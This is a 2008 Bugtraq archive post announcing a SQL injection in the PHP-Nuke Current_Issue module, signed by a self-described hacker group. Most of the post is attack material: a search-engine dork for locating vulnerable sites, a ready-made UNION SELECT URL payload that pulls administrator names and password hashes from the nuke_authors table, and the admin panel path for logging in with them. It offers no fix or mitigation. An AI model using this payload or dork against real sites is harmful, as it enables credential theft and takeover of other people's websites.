Bugtraq mailing list archives

PHP-Nuke Module Current_Issue (summary&id) Remote SQL injection Vulnerability


From: Ehsan_Hp200 () hotmail com
Date: Thu, 30 Oct 2008 07:54:42 -0600

 ###############################  IRANIAN THE BEST HACKERS IN THE WORLD ##################
#################### ####################
##
## Remote SQL injection Vulnerability
##
## PHP-Nuke  Module Current_Issue (summary&id)
##                           
###############################################################
###############################################################
###############################################################
###############################################################
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.only-4dl.tk
##
## Email  : Ehsan_Hp200 () Hotmail com
##     
##
#############################
#############################
#############################
#############################
#############################
#############################
##
##

Dork :  "inurl:modules.php?name=Current_Issue"

 Exploite:

www.victim.com/modules.php?name=Current_Issue&d_op=summary&id=-1+union+select+1,2,3,aid,5,6,pwd,Null,Null+from+nuke_authors--


###############################################################################
Admin Panel: www.victim.com/admin.php
,##############################################################################
special tanks to : All Parsi Hacker security Team members,SAHAND SHABAN , Dj7xpl , ONLY3250 , Jasoos Team ,Enigma2
,#######################################################################################################                
                                       
 ###############################  IRANIAN THE BEST HACKERS IN THE WORLD ##################


Current thread: